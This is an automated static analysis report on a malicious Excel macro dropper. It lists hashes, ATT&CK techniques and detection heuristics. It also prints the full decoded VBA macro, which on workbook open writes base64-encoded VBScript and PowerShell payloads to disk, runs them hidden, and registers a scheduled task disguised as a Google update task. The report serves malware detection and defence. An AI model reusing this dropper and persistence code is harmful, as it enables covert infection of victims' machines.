Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02e47df27545766f…

MALICIOUS

Office (OLE)

75.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2019-03-10
MD5: 456a45b59a7588294cf25a5cab4a9821 SHA-1: 1554e74b935a61d446cb634f80d7d1e200e864bc SHA-256: 02e47df27545766f1e3a3372ed65b71814c7418b8c56a3aeac4a937ce1682284
488 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The Workbook_Open macro executes a PowerShell command to download and save a VBScript payload. The script uses WScript.Shell to create a folder and then saves the downloaded content as 'backup.vbs' and 'DnE.ps1'. The PowerShell command is constructed using base64 encoded strings, indicating a downloader functionality. The presence of 'powershell -EncodedCommand' and WScript.Shell usage strongly suggests a malicious dropper.

Heuristics 11

  • ClamAV: Xls.Dropper.Agent-6465255-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-6465255-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
        Set wss = CreateObject("WScript.Shell")
        Set fso = CreateObject("Scripting.FileSystemObject")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        End If
        cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encod …
        cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
        Set wss = CreateObject("WScript.Shell")
        Set fso = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
        Call doom_Init
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3325 bytes
SHA-256: 7ff419cb3d5c950ba3bb9f4a60ce2f41e1512353fc2978cc30040425c5597f9e
Detection
ClamAV: Vbs.Trojan.Oilrig-6332898-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Call doom_Init
    Call doom_ShowHideSheets
End Sub

Sub doom_ShowHideSheets()
    If ActiveWorkbook.Worksheets(1).Visible Then
        Dim WS_Count As Integer
        Dim I As Integer
        WS_Count = ActiveWorkbook.Worksheets.Count
        For I = 1 To WS_Count
            ActiveWorkbook.Worksheets(I).Visible = True
        Next I
        ActiveWorkbook.Worksheets(1).Visible = False
        ActiveWorkbook.Worksheets(2).Activate
    End If
End Sub

Sub doom_Init()
    Set BackupVbs = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 24)
    Set DnEPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 25)
    Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
    Set wss = CreateObject("WScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
    pth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\RecordedTV\"
    If Not (fso.FolderExists(pth)) Then
        fso.CreateFolder (pth)
    End If
    cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnSPs1 & "'));$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""';Set-Content '" & pth & "DnS.ps1" & "' $f}"""
    cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
    If Not (fso.FileExists(pth & "backup.vbs")) Then
        If Not (fso.FolderExists(pth & "up")) Then
            fso.CreateFolder (pth & "up")
        End If
        If Not (fso.FolderExists(pth & "dn")) Then
            fso.CreateFolder (pth & "dn")
        End If
        If Not (fso.FolderExists(pth & "tp")) Then
            fso.CreateFolder (pth & "tp")
        End If
        wss.Run cmd, 0
        wss.Run cmd2, 0
        Set wss = Nothing
        Set fso = Nothing
    End If
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True